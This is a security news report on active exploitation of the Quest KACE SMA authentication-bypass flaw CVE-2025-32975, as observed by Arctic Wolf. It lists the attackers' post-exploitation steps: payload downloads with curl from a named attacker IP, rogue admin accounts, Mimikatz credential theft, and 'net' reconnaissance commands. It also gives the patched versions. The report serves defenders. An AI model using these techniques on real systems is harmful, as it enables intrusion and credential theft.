Threat actors are believed to be actively exploiting a critical vulnerability affecting the Quest KACE Systems Management Appliance (SMA), according to findings from Arctic Wolf.
The cybersecurity firm reported observing suspicious activity beginning the week of March 9, 2026, across customer environments that aligns with exploitation of CVE‑2025‑32975 on unpatched, internet‑exposed SMA instances. At this time, the attackers’ ultimate objectives remain unclear.
Tracked as CVE‑2025‑32975 with a CVSS score of 10.0, the flaw is an authentication bypass vulnerability that enables attackers to impersonate legitimate users without valid credentials. Successful exploitation could allow full compromise of administrative accounts. Quest released patches for the issue in May 2025.
Based on Arctic Wolf’s analysis, threat actors appear to have leveraged the vulnerability to gain administrative access and remotely execute commands. This included downloading Base64‑encoded payloads from an external server (216.126.225[.]156) using the curl utility.
Following initial access, the attackers reportedly created additional administrative accounts using runkbot.exe, a background process tied to the SMA Agent that facilitates script execution and software management. Investigators also observed Windows Registry changes made via PowerShell, suggesting attempts to establish persistence or alter system behavior.
Additional malicious activity attributed to the attackers includes:
- Harvesting credentials using Mimikatz
- Conducting reconnaissance by enumerating logged‑in users and administrator groups, and executing commands such as
net timeandnet group - Gaining RDP access to backup systems (including Veeam and Veritas) and domain controllers
To mitigate risk, administrators are strongly advised to apply the latest security updates immediately and avoid exposing SMA systems directly to the internet. The vulnerability has been remediated in the following versions:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
